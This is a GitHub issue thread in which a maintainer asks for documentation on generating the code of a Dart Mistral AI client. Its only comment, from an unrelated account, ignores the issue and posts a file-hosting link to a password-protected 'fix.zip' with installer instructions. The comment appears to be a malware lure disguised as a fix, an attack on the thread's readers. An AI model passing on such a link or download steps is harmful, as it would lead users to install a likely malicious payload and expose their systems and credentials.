### ISSUE TITLE
doc: update documentation on generating client code

### ISSUE THREAD

**Issue by gawi151** [nomtek/mistralai_client_dart#66]
**Is your feature request related to a problem? Please describe.**
As we move to code generation of package code. We need a documentation that will describe the process so any maintainer can reproduce it.

**Describe the solution you'd like**
- create docs on generating the client code
- describe what should happen after code generation

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
